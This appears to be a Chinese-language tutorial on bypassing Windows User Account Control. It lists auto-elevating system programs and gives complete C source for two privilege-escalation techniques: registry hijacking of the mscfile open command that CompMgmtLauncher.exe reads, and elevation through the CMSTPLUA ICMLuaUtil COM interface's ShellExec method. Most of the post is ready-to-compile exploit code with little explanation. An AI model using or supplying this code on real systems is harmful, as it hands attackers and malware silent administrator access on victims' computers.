有些系统程序是直接获取管理员权限,而不触发UAC弹框的,这类程序称为白名单程序.例如, slui.exe、wusa.exe、taskmgr.exe、msra.exe、eudcedit.exe、eventvwr.exe、CompMgmtLauncher.exe等.这些 白名单程序可以通过DLL劫持、注入或是修改注册表执行命令的方式启动目标程序,实现Bypass UAC提权操作
利用CompMgmtLauncher.exe、该程序在启动时会查询注册表项"Software\classes\mscfile\shell\open\command"(msc后缀文件默认打开方式)、如果存在就会以管理员权限去执行该项默认程序。
#include
#include
BOOL SetReg(char *);
int main()
{
char *path = "c:\\windows\\system32\\cmd.exe";
SetReg(path);
}
BOOL SetReg(char *lpszExePath)
{
HKEY hKey = NULL;
RegCreateKeyEx(HKEY_CURRENT_USER,"Software\\classes\\mscfile\\shell\\open\\command",0,NULL,0, KEY_WOW64_64KEY | KEY_ALL_ACCESS, NULL, &hKey, NULL);
if (NULL == hKey)
{
return FALSE;
}
RegSetValueEx(hKey, NULL, 0, REG_SZ, (BYTE *)lpszExePath, (1 + lstrlen(lpszExePath)));
RegCloseKey(hKey);
return TRUE;
}
COM提升名称(COM Elevation Moniker)技术允许运行在用户账户控制下的应用程序用提升权限的方法来激活COM类,以提升COM接口权限.所以,基于ICMLuaUtil接口的Bypass UAC的实现原理是利用COM提升名称对 ICMLuaUtil接口提权,提权后通过调用ShellExec方法来创建指定进程,实现Bypass UAC操作.
//bypassUac.cpp
#include
#include
#include "bypassUac.h"
BOOL CMLuaUtilBypassUAC(LPWSTR );
HRESULT CoCreateInstanceAsAdmin(HWND , REFCLSID , REFIID , PVOID *);
int main()
{
LPWSTR path =L"c:\\windows\\system32\\cmd.exe";
CMLuaUtilBypassUAC(path);
}
BOOL CMLuaUtilBypassUAC(LPWSTR lpwszExecutable)
{
HRESULT hr = 0;
CLSID clsidICMLuaUtil = { 0 };
IID iidICMLuaUtil = { 0 };
ICMLuaUtil *CMLuaUtil = NULL;
BOOL bRet = FALSE;
do {
CLSIDFromString(CLSID_CMSTPLUA, &clsidICMLuaUtil);
IIDFromString(IID_ICMLuaUtil, &iidICMLuaUtil);
hr = CoCreateInstanceAsAdmin(NULL, clsidICMLuaUtil, iidICMLuaUtil, (PVOID*)(&CMLuaUtil));//提升CMLuaUtil
if (FAILED(hr))
{
break;
}
hr = CMLuaUtil->lpVtbl->ShellExec(CMLuaUtil, lpwszExecutable, NULL, NULL, 0, SW_SHOW);//CMLuaUtil提供的shellExec方法
if (FAILED(hr))
{
break;
}
bRet = TRUE;
}while(FALSE);
if (CMLuaUtil)
{
CMLuaUtil->lpVtbl->Release(CMLuaUtil);
}
return bRet;
}
HRESULT CoCreateInstanceAsAdmin(HWND hWnd, REFCLSID rclsid, REFIID riid, PVOID *ppVoid)
{
BIND_OPTS3 bo;
WCHAR wszCLSID[MAX_PATH] = { 0 };
WCHAR wszMonikerName[MAX_PATH] = { 0 };
HRESULT hr = 0;
CoInitialize(NULL);
StringFromGUID2(rclsid, wszCLSID, STRSAFE_MAX_CCH);
hr = StringCchPrintfW(wszMonikerName,STRSAFE_MAX_CCH, L"Elevation:Administrator!new:%s", wszCLSID);
if (FAILED(hr))
{
return hr;
}
RtlZeroMemory(&bo, sizeof(bo));
bo.cbStruct = sizeof(bo);
bo.hwnd = hWnd;
bo.dwClassContext = CLSCTX_LOCAL_SERVER;
hr = CoGetObject(wszMonikerName, &bo, riid, ppVoid);
return hr;
}
//bypassUac.h
#ifndef _BYPASS_UAC_H_
#define _BYPASS_UAC_H_
#include
#include
#include
/*自动提升 CMSTPLUA COM 接口*/
#define CLSID_CMSTPLUA L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
#define IID_ICMLuaUtil L"{6EDD6D74-C007-4E75-B76A-E5740995E24C}"
/*cmlua shellexec方法*/
typedef interface ICMLuaUtil ICMLuaUtil;
typedef struct ICMLuaUtilVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in ICMLuaUtil * This,
__RPC__in REFIID riid,
void **ppvObject);
ULONG(STDMETHODCALLTYPE *AddRef)(
__RPC__in ICMLuaUtil * This);
ULONG(STDMETHODCALLTYPE *Release)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method1)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method2)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method3)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method4)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method5)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method6)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *ShellExec)(
__RPC__in ICMLuaUtil * This,
_In_ LPCWSTR lpFile,
_In_opt_ LPCTSTR lpParameters,
_In_opt_ LPCTSTR lpDirectory,
_In_ ULONG fMask,
_In_ ULONG nShow
);
HRESULT(STDMETHODCALLTYPE *SetRegistryStringValue)(
__RPC__in ICMLuaUtil * This,
_In_ HKEY hKey,
_In_opt_ LPCTSTR lpSubKey,
_In_opt_ LPCTSTR lpValueName,
_In_ LPCTSTR lpValueString
);
HRESULT(STDMETHODCALLTYPE *Method9)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method10)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method11)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method12)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method13)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method14)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method15)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method16)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method17)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method18)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method19)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method20)(
__RPC__in ICMLuaUtil * This);
END_INTERFACE
} *PICMLuaUtilVtbl;
interface ICMLuaUtil
{
CONST_VTBL struct ICMLuaUtilVtbl *lpVtbl;
};
HRESULT CoCreateInstanceAsAdmin(HWND hWnd, REFCLSID rclsid, REFIID riid, PVOID *ppVoid);
BOOL CMLuaUtilBypassUAC(LPWSTR lpwszExecutable);
#endif